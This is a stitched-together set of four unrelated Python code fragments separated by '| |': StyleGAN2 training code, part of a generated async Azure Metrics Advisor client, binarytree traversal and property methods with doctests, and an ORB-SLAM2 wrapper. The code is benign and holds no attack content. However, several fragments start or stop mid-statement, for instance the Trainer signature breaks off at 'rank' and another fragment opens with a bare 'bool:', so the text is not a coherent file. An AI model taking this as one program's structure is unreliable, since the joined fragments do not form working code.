for (block, attn_block, q_block) in zip(self.blocks, self.attn_blocks, self.quantize_blocks):
x = block(x)
if exists(attn_block):
x = attn_block(x)
if exists(q_block):
x, _, loss = q_block(x)
quantize_loss += loss
x = self.final_conv(x)
x = self.flatten(x)
x = self.to_logit(x)
return x.squeeze(), quantize_loss
class StyleGAN2(nn.Module):
def __init__(self, image_size, latent_dim = 512, fmap_max = 512, style_depth = 8, network_capacity = 16, transparent = False, fp16 = False, cl_reg = False, steps = 1, lr = 1e-4, ttur_mult = 2, fq_layers = [], fq_dict_size = 256, attn_layers = [], no_const = False, lr_mlp = 0.1, rank = 0):
super().__init__()
self.lr = lr
self.steps = steps
self.ema_updater = EMA(0.995)
self.S = StyleVectorizer(latent_dim, style_depth, lr_mul = lr_mlp)
self.G = Generator(image_size, latent_dim, network_capacity, transparent = transparent, attn_layers = attn_layers, no_const = no_const, fmap_max = fmap_max)
self.D = Discriminator(image_size, network_capacity, fq_layers = fq_layers, fq_dict_size = fq_dict_size, attn_layers = attn_layers, transparent = transparent, fmap_max = fmap_max)
self.SE = StyleVectorizer(latent_dim, style_depth, lr_mul = lr_mlp)
self.GE = Generator(image_size, latent_dim, network_capacity, transparent = transparent, attn_layers = attn_layers, no_const = no_const)
self.D_cl = None
if cl_reg:
from contrastive_learner import ContrastiveLearner
# experimental contrastive loss discriminator regularization
assert not transparent, 'contrastive loss regularization does not work with transparent images yet'
self.D_cl = ContrastiveLearner(self.D, image_size, hidden_layer='flatten')
# wrapper for augmenting all images going into the discriminator
self.D_aug = AugWrapper(self.D, image_size)
# turn off grad for exponential moving averages
set_requires_grad(self.SE, False)
set_requires_grad(self.GE, False)
# init optimizers
generator_params = list(self.G.parameters()) + list(self.S.parameters())
self.G_opt = Adam(generator_params, lr = self.lr, betas=(0.5, 0.9))
self.D_opt = Adam(self.D.parameters(), lr = self.lr * ttur_mult, betas=(0.5, 0.9))
# init weights
self._init_weights()
self.reset_parameter_averaging()
self.cuda(rank)
# startup apex mixed precision
self.fp16 = fp16
if fp16:
(self.S, self.G, self.D, self.SE, self.GE), (self.G_opt, self.D_opt) = amp.initialize([self.S, self.G, self.D, self.SE, self.GE], [self.G_opt, self.D_opt], opt_level='O1', num_losses=3)
def _init_weights(self):
for m in self.modules():
if type(m) in {nn.Conv2d, nn.Linear}:
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in', nonlinearity='leaky_relu')
for block in self.G.blocks:
nn.init.zeros_(block.to_noise1.weight)
nn.init.zeros_(block.to_noise2.weight)
nn.init.zeros_(block.to_noise1.bias)
nn.init.zeros_(block.to_noise2.bias)
def EMA(self):
def update_moving_average(ma_model, current_model):
for current_params, ma_params in zip(current_model.parameters(), ma_model.parameters()):
old_weight, up_weight = ma_params.data, current_params.data
ma_params.data = self.ema_updater.update_average(old_weight, up_weight)
update_moving_average(self.SE, self.S)
update_moving_average(self.GE, self.G)
def reset_parameter_averaging(self):
self.SE.load_state_dict(self.S.state_dict())
self.GE.load_state_dict(self.G.state_dict())
def forward(self, x):
return x
class Trainer():
def __init__(
self,
name = 'default',
results_dir = 'results',
models_dir = 'models',
base_dir = './',
image_size = 128,
network_capacity = 16,
fmap_max = 512,
transparent = False,
batch_size = 4,
mixed_prob = 0.9,
gradient_accumulate_every=1,
lr = 2e-4,
lr_mlp = 0.1,
ttur_mult = 2,
rel_disc_loss = False,
num_workers = None,
save_every = 1000,
evaluate_every = 1000,
num_image_tiles = 8,
trunc_psi = 0.6,
fp16 = False,
cl_reg = False,
no_pl_reg = False,
fq_layers = [],
fq_dict_size = 256,
attn_layers = [],
no_const = False,
aug_prob = 0.,
aug_types = ['translation', 'cutout'],
top_k_training = False,
generator_top_k_gamma = 0.99,
generator_top_k_frac = 0.5,
dual_contrast_loss = False,
dataset_aug_prob = 0.,
calculate_fid_every = None,
calculate_fid_num_images = 12800,
clear_fid_cache = False,
is_ddp = False,
rank | |
The query time range.
:type body: ~azure.ai.metricsadvisor.models.IngestionStatusQueryOptions
:param skip: for paging, skipped number.
:type skip: int
:param maxpagesize: the maximum number of items in one page.
:type maxpagesize: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either IngestionStatusList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.ai.metricsadvisor.models.IngestionStatusList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IngestionStatusList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = "application/json"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_data_feed_ingestion_status.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'dataFeedId': self._serialize.url("data_feed_id", data_feed_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if skip is not None:
query_parameters['$skip'] = self._serialize.query("skip", skip, 'int')
if maxpagesize is not None:
query_parameters['$maxpagesize'] = self._serialize.query("maxpagesize", maxpagesize, 'int')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'IngestionStatusQueryOptions')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
else:
url = '{nextLink}' # FIXME: manually edited; was '/{nextLink}'
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'nextLink': self._serialize.url("next_link", next_link, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'IngestionStatusQueryOptions')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('IngestionStatusList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorCode, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_data_feed_ingestion_status.metadata = {'url': '/dataFeeds/{dataFeedId}/ingestionStatus/query'} # type: ignore
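    # Illustrative consumption sketch (not part of the generated client; names are
    # hypothetical placeholders): the paged operations in this class return an
    # AsyncItemPaged that is consumed with `async for`, fetching pages lazily via
    # `get_next` and unpacking each page with `extract_data`.
    #
    #   async for item in operations.get_data_feed_ingestion_status(feed_id, query_options):
    #       ...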
async def reset_data_feed_ingestion_status(
self,
data_feed_id: str,
body: "_models.IngestionProgressResetOptions",
**kwargs: Any
) -> None:
"""Reset data ingestion status by data feed to backfill data.
Reset data ingestion status by data feed to backfill data.
:param data_feed_id: The data feed unique id.
:type data_feed_id: str
:param body: The backfill time range.
:type body: ~azure.ai.metricsadvisor.models.IngestionProgressResetOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.reset_data_feed_ingestion_status.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'dataFeedId': self._serialize.url("data_feed_id", data_feed_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'IngestionProgressResetOptions')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorCode, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
reset_data_feed_ingestion_status.metadata = {'url': '/dataFeeds/{dataFeedId}/ingestionProgress/reset'} # type: ignore
async def get_ingestion_progress(
self,
data_feed_id: str,
**kwargs: Any
) -> "_models.DataFeedIngestionProgress":
"""Get data last success ingestion job timestamp by data feed.
Get data last success ingestion job timestamp by data feed.
:param data_feed_id: The data feed unique id.
:type data_feed_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DataFeedIngestionProgress, or the result of cls(response)
:rtype: ~azure.ai.metricsadvisor.models.DataFeedIngestionProgress
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DataFeedIngestionProgress"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_ingestion_progress.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'dataFeedId': self._serialize.url("data_feed_id", data_feed_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorCode, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DataFeedIngestionProgress', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_ingestion_progress.metadata = {'url': '/dataFeeds/{dataFeedId}/ingestionProgress'} # type: ignore
def get_metric_data(
self,
metric_id: str,
body: "_models.MetricDataQueryOptions",
**kwargs: Any
) -> AsyncIterable["_models.MetricDataList"]:
"""Get time series data from metric.
Get time series data from metric.
:param metric_id: metric unique id.
:type metric_id: str
:param body: query time series data condition.
:type body: ~azure.ai.metricsadvisor.models.MetricDataQueryOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either MetricDataList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.ai.metricsadvisor.models.MetricDataList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.MetricDataList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = "application/json"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_metric_data.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'metricId': self._serialize.url("metric_id", metric_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MetricDataQueryOptions')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'metricId': self._serialize.url("metric_id", metric_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MetricDataQueryOptions')
body_content_kwargs['content'] = body_content
request = self._client.get(url, query_parameters, header_parameters, **body_content_kwargs)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('MetricDataList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorCode, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_metric_data.metadata = {'url': '/metrics/{metricId}/data/query'} # type: ignore
def get_metric_series(
self,
metric_id: str,
body: "_models.MetricSeriesQueryOptions",
skip: Optional[int] = None,
maxpagesize: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.MetricSeriesList"]:
"""List series (dimension combinations) from metric.
List series (dimension combinations) from metric.
:param metric_id: metric unique id.
:type metric_id: str
:param body: filter to query series.
:type body: ~azure.ai.metricsadvisor.models.MetricSeriesQueryOptions
:param skip: for paging, skipped number.
:type skip: int
:param maxpagesize: the maximum number of items in one page.
:type maxpagesize: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either MetricSeriesList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.ai.metricsadvisor.models.MetricSeriesList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.MetricSeriesList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = "application/json"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_metric_series.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'metricId': self._serialize.url("metric_id", metric_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if skip is not None:
query_parameters['$skip'] = self._serialize.query("skip", skip, 'int')
if maxpagesize is not None:
query_parameters['$maxpagesize'] = self._serialize.query("maxpagesize", maxpagesize, 'int')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MetricSeriesQueryOptions')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
else:
url = '{nextLink}' # FIXME: manually edited; was '/{nextLink}'
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'nextLink': self._serialize.url("next_link", next_link, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
| |
bool:
"""Check if the binary tree is strict.
A binary tree is strict if all its non-leaf nodes have both the left
and right child nodes.
:return: True if the binary tree is strict, False otherwise.
:rtype: bool
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>>
>>> print(root)
<BLANKLINE>
__1
/ \\
2 3
/ \\
4 5
<BLANKLINE>
>>> root.is_strict
True
"""
return _get_tree_properties(self).is_strict
@property
def is_complete(self) -> bool:
"""Check if the binary tree is complete.
A binary tree is complete if it meets the following criteria:
* All levels except possibly the last are completely filled.
* Last level is left-justified.
:return: True if the binary tree is complete, False otherwise.
:rtype: bool
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>>
>>> print(root)
<BLANKLINE>
__1
/ \\
2 3
/ \\
4 5
<BLANKLINE>
>>> root.is_complete
True
"""
return _get_tree_properties(self).is_complete
@property
def min_node_value(self) -> NodeValue:
"""Return the minimum node value of the binary tree.
:return: Minimum node value.
:rtype: float | int
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>>
>>> root.min_node_value
1
"""
return _get_tree_properties(self).min_node_value
@property
def max_node_value(self) -> NodeValue:
"""Return the maximum node value of the binary tree.
:return: Maximum node value.
:rtype: float | int
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>>
>>> root.max_node_value
3
"""
return _get_tree_properties(self).max_node_value
@property
def max_leaf_depth(self) -> int:
"""Return the maximum leaf node depth of the binary tree.
:return: Maximum leaf node depth.
:rtype: int
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.right.left = Node(4)
>>> root.right.left.left = Node(5)
>>>
>>> print(root)
<BLANKLINE>
1____
/ \\
2 3
/
4
/
5
<BLANKLINE>
>>> root.max_leaf_depth
3
"""
return _get_tree_properties(self).max_leaf_depth
@property
def min_leaf_depth(self) -> int:
"""Return the minimum leaf node depth of the binary tree.
:return: Minimum leaf node depth.
:rtype: int
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.right.left = Node(4)
>>> root.right.left.left = Node(5)
>>>
>>> print(root)
<BLANKLINE>
1____
/ \\
2 3
/
4
/
5
<BLANKLINE>
>>> root.min_leaf_depth
1
"""
return _get_tree_properties(self).min_leaf_depth
@property
def properties(self) -> Dict[str, Any]:
"""Return various properties of the binary tree.
:return: Binary tree properties.
:rtype: dict
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>> props = root.properties
>>>
>>> props['height'] # equivalent to root.height
2
>>> props['size'] # equivalent to root.size
5
>>> props['max_leaf_depth'] # equivalent to root.max_leaf_depth
2
>>> props['min_leaf_depth'] # equivalent to root.min_leaf_depth
1
>>> props['max_node_value'] # equivalent to root.max_node_value
5
>>> props['min_node_value'] # equivalent to root.min_node_value
1
>>> props['leaf_count'] # equivalent to root.leaf_count
3
>>> props['is_balanced'] # equivalent to root.is_balanced
True
>>> props['is_bst'] # equivalent to root.is_bst
False
>>> props['is_complete'] # equivalent to root.is_complete
True
>>> props['is_symmetric'] # equivalent to root.is_symmetric
False
>>> props['is_max_heap'] # equivalent to root.is_max_heap
False
>>> props['is_min_heap'] # equivalent to root.is_min_heap
True
>>> props['is_perfect'] # equivalent to root.is_perfect
False
>>> props['is_strict'] # equivalent to root.is_strict
True
"""
properties = _get_tree_properties(self).__dict__.copy()
properties["is_balanced"] = _is_balanced(self) >= 0
properties["is_bst"] = _is_bst(self)
properties["is_symmetric"] = _is_symmetric(self)
return properties
@property
def inorder(self) -> List["Node"]:
"""Return the nodes in the binary tree using in-order_ traversal.
An in-order_ traversal visits left subtree, root, then right subtree.
.. _in-order: https://en.wikipedia.org/wiki/Tree_traversal
:return: List of nodes.
:rtype: [binarytree.Node]
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>>
>>> print(root)
<BLANKLINE>
__1
/ \\
2 3
/ \\
4 5
<BLANKLINE>
>>> root.inorder
[Node(4), Node(2), Node(5), Node(1), Node(3)]
"""
result: List[Node] = []
stack: List[Node] = []
node: Optional[Node] = self
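        # Iterative in-order traversal: walk down the left spine pushing nodes onto the
        # stack, then visit the node on top and continue with its right subtree.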
while node or stack:
while node:
stack.append(node)
node = node.left
if stack:
node = stack.pop()
result.append(node)
node = node.right
return result
@property
def preorder(self) -> List["Node"]:
"""Return the nodes in the binary tree using pre-order_ traversal.
A pre-order_ traversal visits root, left subtree, then right subtree.
.. _pre-order: https://en.wikipedia.org/wiki/Tree_traversal
:return: List of nodes.
:rtype: [binarytree.Node]
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>>
>>> print(root)
<BLANKLINE>
__1
/ \\
2 3
/ \\
4 5
<BLANKLINE>
>>> root.preorder
[Node(1), Node(2), Node(4), Node(5), Node(3)]
"""
result: List[Node] = []
stack: List[Optional[Node]] = [self]
while stack:
node = stack.pop()
if node:
result.append(node)
stack.append(node.right)
stack.append(node.left)
return result
@property
def postorder(self) -> List["Node"]:
"""Return the nodes in the binary tree using post-order_ traversal.
A post-order_ traversal visits left subtree, right subtree, then root.
.. _post-order: https://en.wikipedia.org/wiki/Tree_traversal
:return: List of nodes.
:rtype: [binarytree.Node]
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>>
>>> print(root)
<BLANKLINE>
__1
/ \\
2 3
/ \\
4 5
<BLANKLINE>
>>> root.postorder
[Node(4), Node(5), Node(2), Node(3), Node(1)]
"""
result: List[Node] = []
stack: List[Optional[Node]] = [self]
while stack:
node = stack.pop()
if node:
result.append(node)
stack.append(node.left)
stack.append(node.right)
return result[::-1]
@property
def levelorder(self) -> List["Node"]:
"""Return the nodes in the binary tree using level-order_ traversal.
A level-order_ traversal visits nodes left to right, level by level.
.. _level-order:
https://en.wikipedia.org/wiki/Tree_traversal#Breadth-first_search
:return: List of nodes.
:rtype: [binarytree.Node]
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>>
>>> print(root)
<BLANKLINE>
__1
/ \\
2 3
/ \\
4 5
<BLANKLINE>
>>> root.levelorder
[Node(1), Node(2), Node(3), Node(4), Node(5)]
"""
current_nodes = [self]
result = []
while len(current_nodes) > 0:
next_nodes = []
for node in current_nodes:
result.append(node)
if node.left is not None:
next_nodes.append(node.left)
if node.right is not None:
next_nodes.append(node.right)
current_nodes = next_nodes
return result
def _is_balanced(root: Optional[Node]) -> int:
"""Return the tree height + 1 if balanced, -1 otherwise.
:param root: Root node of the binary tree.
:type root: binarytree.Node | None
:return: Height + 1 if the binary tree is balanced, -1 otherwise.
:rtype: int
"""
if root is None:
return 0
left = _is_balanced(root.left)
if left < 0:
return -1
right = _is_balanced(root.right)
if right < 0:
return -1
return -1 if abs(left - right) > 1 else max(left, right) + 1
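# Worked example (illustrative only, not part of the original module):
#
#   balanced = Node(1); balanced.left = Node(2); balanced.right = Node(3)
#   _is_balanced(balanced)   # -> 2  (height 1, plus 1)
#
#   chain = Node(1); chain.left = Node(2); chain.left.left = Node(3)
#   _is_balanced(chain)      # -> -1 (subtree heights at the root differ by 2)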
def _is_bst(root: Optional[Node]) -> bool:
"""Check if the binary tree is a BST (binary search tree).
:param root: Root node of the binary tree.
:type root: binarytree.Node | None
:return: True if the binary tree is a BST, False otherwise.
:rtype: bool
"""
stack: List[Node] = []
cur = root
pre = None
while stack or cur is not None:
if cur is not None:
stack.append(cur)
cur = cur.left
else:
node = stack.pop()
if pre is not None and node.val <= pre.val:
return False
pre = node
cur = node.right
return True
def _is_symmetric(root: Optional[Node]) -> bool:
"""Check if the binary tree is symmetric.
:param root: Root node of the binary tree.
:type root: binarytree.Node | None
:return: True if the binary tree is symmetric, False otherwise.
:rtype: bool
"""
def symmetric_helper(left: Optional[Node], right: Optional[Node]) -> bool:
if left is None and right is None:
return True
        if left is None or right is None:
            return False
        return (
            left.val == right.val
            and symmetric_helper(left.left, right.right)
            and symmetric_helper(left.right, right.left)
        )

    return symmetric_helper(root, root)
rekey_map[subprocess_stamp] is not None
}
# Log the subprocess timestamps that do not appear in our known list
unknown_keys = [
subprocess_stamp for subprocess_stamp in rekey_map.keys()
if rekey_map[subprocess_stamp] is None
]
if len(unknown_keys) > 0:
logging.getLogger(__name__).warning(
"The following timestamps were returned by the subprocess, "
"but do not match any image timstamp known by the parent process: " + str(unknown_keys))
# Merge the data from the subprocess with the partial frame results
for timestamp, frame_stats in frame_statistics.items():
frame_result = self._partial_frame_results[timestamp]
if frame_stats[0] is not None:
frame_result.processing_time = frame_stats[0]
frame_result.num_features = frame_stats[1]
frame_result.num_matches = frame_stats[2]
frame_result.tracking_state = frame_stats[3]
frame_result.loop_edges = list(frame_stats[5])
if frame_stats[4] is not None:
estimated_pose = np.identity(4)
estimated_pose[0:3, :] = frame_stats[4]
frame_result.estimated_pose = make_relative_pose(estimated_pose)
if not all(loop_timestamp in timestamps for loop_timestamp in frame_result.loop_edges):
logging.getLogger(__name__).warning(f"Loop closures for {timestamp} didn't match a known timestamp")
result = SLAMTrialResult(
system=self.pk,
success=len(self._partial_frame_results) > 0,
results=[self._partial_frame_results[timestamp]
for timestamp in sorted(timestamps)],
has_scale=(self.mode != SensorMode.MONOCULAR),
settings={
'in_fx': self._intrinsics.fx,
'in_fy': self._intrinsics.fy,
'in_cx': self._intrinsics.cx,
'in_cy': self._intrinsics.cy,
'in_k1': self._intrinsics.k1,
'in_k2': self._intrinsics.k2,
'in_p1': self._intrinsics.p1,
'in_p2': self._intrinsics.p2,
'in_k3': self._intrinsics.k3,
'in_width': self._intrinsics.width,
'in_height': self._intrinsics.height,
'base': self._stereo_baseline if self._stereo_baseline is not None else float('nan'),
'vocabulary_file': str(self.vocabulary_file),
'mode': str(self.mode.name),
'depth_threshold': self.depth_threshold,
'orb_num_features': self.orb_num_features,
'orb_scale_factor': self.orb_scale_factor,
'orb_num_levels': self.orb_num_levels,
'orb_ini_threshold_fast': self.orb_ini_threshold_fast,
'orb_min_threshold_fast': self.orb_min_threshold_fast
}
)
result.run_time = time.time() - self._start_time
self._partial_frame_results = None
self._start_time = None
return result
@classmethod
def get_instance(
cls,
mode: SensorMode = None,
vocabulary_file: str = None,
vocabulary_branching_factor: int = 10,
vocabulary_depth: int = 6,
vocabulary_seed: int = 0,
depth_threshold: float = 40.0,
orb_num_features: int = 2000,
orb_scale_factor: float = 1.2,
orb_num_levels: int = 8,
orb_ini_threshold_fast: int = 12,
orb_min_threshold_fast: int = 7
) -> 'OrbSlam2':
"""
Get an instance of this vision system, with some parameters, pulling from the database if possible,
or construct a new one if needed.
It is the responsibility of subclasses to ensure that as few instances of each system as possible exist
within the database.
Does not save the returned object; you will usually want to do that straight away.
Also does not build the vocabulary; handle that and re-save the object before using it.
:return: An OrbSlam2 instance with the given settings.
"""
if mode is None:
raise ValueError("Cannot search for ORBSLAM without a mode, please specify a sensor mode")
# Look for existing objects with the same settings
query = {
'mode': str(mode.name),
'depth_threshold': float(depth_threshold),
'orb_num_features': int(orb_num_features),
'orb_scale_factor': float(orb_scale_factor),
'orb_num_levels': int(orb_num_levels),
'orb_ini_threshold_fast': int(orb_ini_threshold_fast),
'orb_min_threshold_fast': int(orb_min_threshold_fast)
}
if vocabulary_file is not None and len(vocabulary_file) > 0:
# Only request a specific vocabulary file if one is requested, otherwise leave the parameter free.
query['vocabulary_file'] = str(vocabulary_file)
else:
# No vocabulary file specified, look for a system with the same settings
query['vocabulary_branching_factor'] = int(vocabulary_branching_factor)
query['vocabulary_depth'] = int(vocabulary_depth)
query['vocabulary_seed'] = int(vocabulary_seed)
all_objects = OrbSlam2.objects.raw(query)
if all_objects.count() > 0:
return all_objects.first()
# There isn't an existing system with those settings, make a new one.
obj = cls(
mode=mode,
vocabulary_file=vocabulary_file,
vocabulary_branching_factor=int(vocabulary_branching_factor),
vocabulary_depth=int(vocabulary_depth),
vocabulary_seed=int(vocabulary_seed),
depth_threshold=float(depth_threshold),
orb_num_features=int(orb_num_features),
orb_scale_factor=float(orb_scale_factor),
orb_num_levels=int(orb_num_levels),
orb_ini_threshold_fast=int(orb_ini_threshold_fast),
orb_min_threshold_fast=int(orb_min_threshold_fast)
)
return obj
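    # A minimal usage sketch (illustrative only; assumes a configured object store
    # behind `OrbSlam2.objects` / `save()` and a SensorMode enum member):
    #
    #   system = OrbSlam2.get_instance(mode=SensorMode.MONOCULAR, vocabulary_file='')
    #   system.save()                    # persist before building the vocabulary
    #   system.build_vocabulary(image_sources, output_folder)
    #   system.save()                    # re-save so the new vocabulary_file is stored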
def save_settings(self):
if self._settings_file is None:
if self._temp_folder is None:
raise RuntimeError("Cannot save settings, no configured temporary directory")
if self._intrinsics is None:
raise RuntimeError("Cannot save settings without the camera intrinsics")
# Build the settings object
